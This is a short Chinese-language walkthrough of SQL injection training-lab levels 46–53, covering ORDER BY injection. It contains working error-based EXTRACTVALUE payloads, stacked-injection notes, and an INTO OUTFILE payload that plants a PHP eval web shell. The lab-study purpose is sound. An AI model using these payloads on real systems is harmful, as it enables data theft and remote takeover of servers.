目录
第 46 关
排序注入
源码: $sql = "SELECT * FROM users ORDER BY $id";
select使用文档:https://dev.mysql.com/doc/refman/8.0/en/select.html
分析:不同于 where 查询后可以用 union select 注入,可见order by后面不能使用联合查询,可以使用
limit,into outfile等语句,还可以跟数字等。
?sort=1 AND EXTRACTVALUE(1,(CONCAT(0x7e,(payload),0x7e))) #
第 47 关
同第 46 关
不同点:字符型,需要用 ' 闭合 ,需要用 --%20注释
?sort=1' AND EXTRACTVALUE(1,(CONCAT(0x7e,(payload),0x7e))) --%20
第 48 关
注入木马:
?sort=1 INTO OUTFILE "D:/phpstudy2016/An/WWW/Test-48.php" LINES TERMINATED BY '<?php @eval($_POST[pass]) ?>' --%20
第 49 关
同第 48 关
区别:字符型,需要用 ' 闭合
第 50 关
同第 46 关
区别:因为第 50 关应用了 mysqli_multi_query 函数,所以可以使用堆叠注入。
第 51 关
同第 47 关
第 52 关
同第 48 关
第 53 关
同第 49 关
注:50-53关都可以用堆叠注入。